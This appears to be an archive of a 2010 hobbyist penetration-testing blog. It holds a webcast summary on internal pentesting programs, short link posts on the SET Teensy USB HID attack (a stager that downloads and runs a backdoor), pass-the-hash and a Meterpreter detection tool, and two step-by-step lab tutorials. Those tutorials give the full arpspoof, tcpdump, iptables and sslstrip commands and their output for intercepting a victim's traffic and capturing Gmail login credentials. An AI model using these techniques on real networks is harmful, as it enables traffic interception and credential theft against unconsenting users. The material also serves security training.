PaulDotCom: Archives : Zen and The Art Of An Internal Penetration Testing Program

5 09 2010

Ok Ok …. I know im 2 years late to post this as a “new” presentation – but there is some interesting & valuable info in here about pentesting your internal network. Its starts out pretty high level, but is a nice rounded overview on the reasons, methods & tools that you can use to penetration test your network. Hosted by CoreSecurity & presented by Paul Asadoorian from pauldotcom.


• Phase I – Target identification
• Phase II – Detect OS & Services
• Phase III – Identify Vulnerabilities


• Phase IV – Exploitation
• Phase V – Post-Exploitation
• Phase VI – Reporting

Part 1 has some great grounding information in penetration testing, examples in here for several tools (nmap, nessus, nbtscan etc) and also ways to link them together, eg, run an nmap scan across the network, identifying windows hosts listening on 445, use the nmap scripting engine to determine if they are vulnerable – and use that list of hosts in nessus or metasploit etc.

Part 2 contains more information on why should you exploit a machine, how to exploit etc, using both Metasploit & Core Impact. Some useful info on tasks to perform once you have compromised a host – automated info gathering, looking for sensitive data, gathering screenshots, video, sound recordings etc etc. This segment ends with some good tips on how to report this information to management, then some Q&A.

there is some great info in here, its worth a look.

Part 1:

This webcast is Part I of a two part series I am doing in collaboration with Core Security Technologies. The presentation is full of tips, tricks, process, and practical knowledge about performing penetration testing within your own organization. Whether you are a third-party doing penetration tests or want to penetration test your internal network, this webcast is for you! In Part I I cover such topics as finding rogue access points, processes for creating a successful penetration testing program, identifying targets, and more! Information and resources are below:

via PaulDotCom: Archives.


Zen and the Art of an Internal Penetration Testing Program Part I with Paul Asadoorian
Recording date: Wednesday, November 19, 2008 3:00 pm Eastern Standard Time (New York, GMT-05:00)
Panelist Information: Paul Asadoorian of PaulDotCom Security Weekly
Duration: 1 hour 9 minutes

Please join Core Security and Paul Asadoorian, founder of PaulDotCom Security Weekly, for a live webcast: “Zen and the Art of Maintaining an Internal Penetration Testing Program.”

During this webcast, Asadoorian will offer tips on successfully integrating penetration testing into your vulnerability management program. You’ll learn:

* How to determine if internal penetration testing is right for your organization
* What questions you should ask when planning a pen testing initiative
* How you can best pitch testing to other departments and gain permission from management
* What types of tests to run and how to address the process of dealing with compromised devices
* Which tips and tricks can help you carry out faster, more effective testing

Whether you’re considering rolling out an internal penetration testing program or need a refresher of best practices for your current testing initiatives, this webcast is sure to be time well-spent.

via Core Security: Recorded webcast

Part 2:

During the webcast, Paul Asadoorian of PaulDotCom Security Weekly will discuss best practices for automating your security testing initiatives. You’ll learn tips and tricks for tying vulnerability scanning, penetration testing and reporting into an efficient, repeatable testing process. Paul will demonstrate techniques for vulnerability identification and exploitation, including:

• Importing Nmap data into Nessus
• Using Nessus, and running nessuscmd to automate vulnerability scanning
• Importing results into Metasploit
• Running msfcli to automate penetration testing
• Importing Nmap & Nessus results into CORE IMPACT Pro
• Using Python to script tasks on compromised hosts with CORE IMPACT Pro

You’ll also get answers to questions such as, “How do I integrate password cracking into my testing?” and “What should I do once a host is compromised during a test?”

via Core Security: Recorded webcast


Social-Engineer Toolkit v0.6.1 Teensy USB HID Attack Vector | Blog

17 08 2010

hehehe … it was only a matter of time. With devices such as the original yubikey that I have been using being able to be programed to auto launch a website when plugged in, its good to see the idea going to the next level:

Social-Engineer Toolkit v0.6.1 Teensy USB HID Attack VectorPosted by relik @ 8:31 pmThe Teensy devices are Arduino based devices that allow you to utilize onboard memory storage on a microcontroller and emulate a keyboard/mouse. In the Social-Engineer Toolkit SET, gives you the ability to choose Metasploit based payloads and drop a small download stager either through WSCRIPT or through PowerShell to download a backdoor from a remote IP/machine and execute it on the system itself. Why this attack is so useful is that it emulates a keyboard 100 percent, so you can essentially bypass any autorun protections on the system since its a keyboard, not a flash drive or CD/DVD type autorun attack. SET handles the entire creation from a webserver housing the malicious payload, to the actually Metasploit handler.

via Social-Engineer Toolkit v0.6.1 Teensy USB HID Attack Vector | Blog.

Original credit appears to be going to irongeek from his very detailed original posting – including pictures (we all like pictures) here: Programmable HID USB Keystroke Dongle: Using the Teensy as a pen testing device

Dissecting the Pass the Hash Attack

28 07 2010

Nice to see an article including Backtrack on the list. Its a nice writeup on using backtrack to pass the hash to use psexec to remotely launch a reverse shell. If you havent read much about using password hashes, this would be a good read. It also links to other articles about gaining access to hashed passwords, from physical box access to various tools.

In this article we will look at how this technique works and I will demonstrate the process that can be used to take stolen password hashes and use them successfully without having to crack their hidden contents. As always, I will cover some detection and defensive techniques on how you can prevent yourself from falling victim to this attack.

via Dissecting the Pass the Hash Attack.

Antimeter: Detect & Kill Metasploit Meterpreter! — PenTestIT

9 07 2010

Antimeter is a very useful tool for internal security administrators who can scan their systems for meterpreter session remains after they have successfully exploited any system with Metasploit.

Today most of the penetration testers who can not afford heavily paid security software’s use Metasploit for penetration testing. Couple of days back, the latest version of Metasploit was released . As most of these tools work or exploit in memory of target system, after a successful exploitation, it is necessary to clean the system . In such situations antimeter comes handy. Also, you could use it on an important production server to check for any meterpreter shells and kill them if detected.

via Antimeter: Detect & Kill Metasploit Meterpreter! — PenTestIT.

mitm packet capturing & basic analysis

17 06 2010

We all know the difference between a hub & a switch (if not, this is not the blog for you). As most networks these days will be switched, its no longer a case of plug in & dump packets. So here is the easy way to capture traffic from the network for investigation later. This works with wired or wireless. This is a combination of skillz in my SSLSTRIP post and the Image Extraction post.

Simply put, we use arpspoof to convince the gateway that we are the target, and the target that we are the gateway.

Target selection (our IP is, default gateway is

root@bt:~# ifconfig
eth0      Link encap:Ethernet  HWaddr 00:0c:29:ab:b2:2c
          inet addr:  Bcast:  Mask:
          RX packets:22 errors:0 dropped:0 overruns:0 frame:0
          TX packets:10 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:3682 (3.6 KB)  TX bytes:1753 (1.7 KB)
          Interrupt:19 Base address:0x2000

root@bt:~# netstat -nr
Kernel IP routing table
Destination     Gateway         Genmask         Flags   MSS Window  irtt Iface   U         0 0          0 eth0         UG        0 0          0 eth0

root@bt:~# nmap -sP

Starting Nmap 5.21 ( ) at 2010-06-17 21:10 EST
Nmap scan report for
Host is up (0.00018s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for
Host is up (0.0015s latency).
MAC Address: 00:50:56:E5:F7:F0 (VMware)
Nmap scan report for
Host is up (0.00076s latency).
MAC Address: 00:0C:29:09:04:71 (VMware)
Nmap scan report for
Host is up.
Nmap scan report for
Host is up (0.00050s latency).
MAC Address: 00:50:56:F8:EC:20 (VMware)
Nmap done: 255 IP addresses (5 hosts up) scanned in 4.36 seconds

So we have a couple of other hosts there, we will use

We want to get traffic from to the gateway (internet) sent to us, and traffic from the gateway back to also sent to us, we do that with the following arpspoof commands.

Windows host before arpspoof:

C:\Documents and Settings\Administrator>arp -a

Interface: --- 0x2
  Internet Address      Physical Address      Type          00-50-56-e5-f7-f0     dynamic

arpspoof commands to run on our backtrack box, not forgetting to enable ip forwarding

root@bt:~# echo 1 > /proc/sys/net/ipv4/ip_forward

root@bt:~# arpspoof -i eth0 -t
0:c:29:ab:b2:2c 0:c:29:9:4:71 0806 42: arp reply is-at 0:c:29:ab:b2:2c
0:c:29:ab:b2:2c 0:c:29:9:4:71 0806 42: arp reply is-at 0:c:29:ab:b2:2c

root@bt:~# arpspoof -i eth0 -t
0:c:29:ab:b2:2c 0:50:56:e5:f7:f0 0806 42: arp reply is-at 0:c:29:ab:b2:2c
0:c:29:ab:b2:2c 0:50:56:e5:f7:f0 0806 42: arp reply is-at 0:c:29:ab:b2:2c

and our windows box ?

C:\Documents and Settings\Administrator>arp -a

Interface: --- 0x2
  Internet Address      Physical Address      Type          00-0c-29-ab-b2-2c     dynamic        00-0c-29-ab-b2-2c     dynamic

and of course, kick off your tcpdump session (without the arpspoof traffic)

root@bt:~# tcpdump -s0 -i eth0 not arp -w eth0capture
tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 65535 bytes

so, we have a shiny new file, full of data goodness – what to do with it. There are several ways you can look at the data:
urlsnarf – prints http requests
driftnet – extracts files from capture
tcpxtract – another extractor from captures **Needs installation, but it got me the best results**

Setup the apps to listen on the local interface in separate windows, then feed your packets into that interface with tcpreplay.

root@bt:~# urlsnarf -i lo
urlsnarf: listening on lo [tcp port 80 or port 8080 or port 3128]

root@bt:~# driftnet -i lo
driftnet: saving `/tmp/driftnet-5VbG3g/driftnet-4c1a110b643c9869.jpeg' as `driftnet-0.jpeg'
driftnet: saving `/tmp/driftnet-5VbG3g/driftnet-4c1a110b643c9869.jpeg' as `driftnet-1.jpeg'

root@bt:~# tcpreplay -i lo eth0capture-s0
sending out lo
processing file: eth0capture-s0
Actual: 18412 packets (15604605 bytes) sent in 105.88 seconds
Rated: 148490.3 bps, 1.13 Mbps/sec, 175.20 pps

Statistics for network device: lo
        Attempted packets:         18412
        Successful packets:        18412
        Failed packets:            0
        Retried packets (ENOBUFS): 0
        Retried packets (EAGAIN):  0

root@bt:~# apt-get install tcpxtract
root@bt:~# mkdir tcpxtract
root@bt:~# tcpxtract -f eth0capture-s0 -o tcpxtract/
Found file of type "html" in session [ ->], exporting to tcpxtract/00000000.html
Found file of type "html" in session [ ->], exporting to tcpxtract/00000001.html

There we go, we extracted some info from the packet capture. Next time I will cover a much nicer util to get our files out of the capture file.

image extraction from packet capture

13 06 2010

Some very interesting tools used in this vid, showing that you dont need to be watching live streams to catch interesting fish 😀

Great video on using ettercap to capture traffic & a selection of tools to extract data (mainly images) from the traffic.

tcpxtract (can be installed from the backtrack repos)
urlsnarf/driftnet –> dsniff suite

Linked from the following post from “adaywithtape

capturing credentials with sslstrip

11 06 2010

You may or may not have seen this tool before, there are plenty of videos around that show you how to use it – let me add one more “howto” & show you my fun with it.


You are attached to the same network (sorry kids, not a remote vector) as the victim with a backtrack (doesnt need to be backtrack, but I use it regularly) machine and have downloaded sslstrip.

Get it: download & unpack

root@bt:~/scripts/sslstrip# wget
root@bt:~/scripts/sslstrip# tar zxvf sslstrip-0.7.tar.gz

Setup: you need to enable ip forwarding in linux & setup a forward for all port 80 traffic to port 10000 (default sslstrip port). Run sslstrip & get it to write the credentials out to a file with -w

root@bt:~/scripts/sslstrip# echo 1 > /proc/sys/net/ipv4/ip_forward
root@bt:~/scripts/sslstrip# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
root@bt:~/scripts/sslstrip/sslstrip-0.7# python -f -w sslcreds-captured

Once this is done, we are nearly there – now to get users to send their traffic through your machine on the way to the gateway. In this case, the target is & the real gateway is

root@bt:~# arpspoof -i eth0 -t
0:c:29:ab:b2:2c 0:c:29:9:4:71 0806 42: arp reply is-at 0:c:29:ab:b2:2c
0:c:29:ab:b2:2c 0:c:29:9:4:71 0806 42: arp reply is-at 0:c:29:ab:b2:2c
0:c:29:ab:b2:2c 0:c:29:9:4:71 0806 42: arp reply is-at 0:c:29:ab:b2:2c
0:c:29:ab:b2:2c 0:c:29:9:4:71 0806 42: arp reply is-at 0:c:29:ab:b2:2c

Cool – so now what … what have we actually done … lets deconstruct it a little:

Firstly linux has been configured to forward packets, we setup a redirect iptables rule to redirect all traffic except port 80, which it sends to sslstrip which we ran on the default port 10000 and we are writing out to log sslcreds-captured.

Next was to get the target to send their traffic to us instead of the gateway, using arpspoof we are telling our target that the gateway address of is actually our nic

Our Target machine nic is 00-0C-29-09-04-71, which arpspoof automatically gathered when we ran it.

We could have easily gathered this from the backtrack machine

root@bt:~# nmap -sP

Starting Nmap 5.21 ( ) at 2010-06-10 22:18 EST
Nmap scan report for
Host is up (0.00049s latency).
MAC Address: 00:0C:29:09:04:71 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 0.08 seconds

but to show the actual client config, here is the windows ipconfig /all output

Ethernet adapter Local Area Connection:

Connection-specific DNS Suffix  . :
Description . . . . . . . . . . . : VMware Accelerated AMD PCNet Adapter

Physical Address. . . . . . . . . : 00-0C-29-09-04-71
Dhcp Enabled. . . . . . . . . . . : Yes
Autoconfiguration Enabled . . . . : Yes
IP Address. . . . . . . . . . . . :
Subnet Mask . . . . . . . . . . . :
Default Gateway . . . . . . . . . :
DHCP Server . . . . . . . . . . . :
DNS Servers . . . . . . . . . . . :
Lease Obtained. . . . . . . . . . : Thursday, 10 June 2010 8:54:17 PM
Lease Expires . . . . . . . . . . : Friday, 11 June 2010 8:54:17 PM

So, what does the arp spoofing look like on the target

C:\Documents and Settings\Administrator>arp -a

Interface: --- 0x2
Internet Address      Physical Address      Type         00-02-b3-a9-a5-13     dynamic


C:\Documents and Settings\Administrator>arp -a

Interface: --- 0x2
Internet Address      Physical Address      Type         00-0c-29-ab-b2-2c     dynamic

Notice the original gateway MAC address 00-02-b3-a9-a5-13 has been replaced by our attacker MAC 00-0c-29-ab-b2-2c.

User Experience:
We will use GMAIL as an example of this, but many many web pages use http for the body & simply use https for form post, which this script takes advantage of.

So our user wants to login to their GMAIL account, so they fire up the browser & type in

Normal GMAIL page:

***Notice the url is https://……… & there is a padlock on the right hand side***

sslstrip GMAIL page:

***Notice the url is actually http://……… & there is a padlock on the left hand side, this padlock is actually a favicon of a padlock added by sslstrip to trick those not paying attention***

This is the only subtle difference that the user gets, sslstrip detects the https tags in the pages requested & re-writes them as http back to the client. From sslstrip to the server is still https, so GMAIL is happy its an ssl connection & the target is happy as he sees the identical logon page he is used to seeing, only its delivered as an http page, not https. As we are not trying to rewrite an https page back to the user, there are zero certificate popups etc.

So he logs in, gets his mail & lives happily ever after:


Remember we were writing to an output file

root@bt:~/scripts/sslstrip/sslstrip-0.7# cat sslcreds-captured
2010-06-10 22:07:25,992 SECURE POST Data (

The most interesting bits of that are ..
*note, the %24 is actually the hex value for the dollar ‘$’ symbol
Because johndoe is super secure & has chosen a long password he must be safe …. except for that one time he connected at the wrong internet cafe ……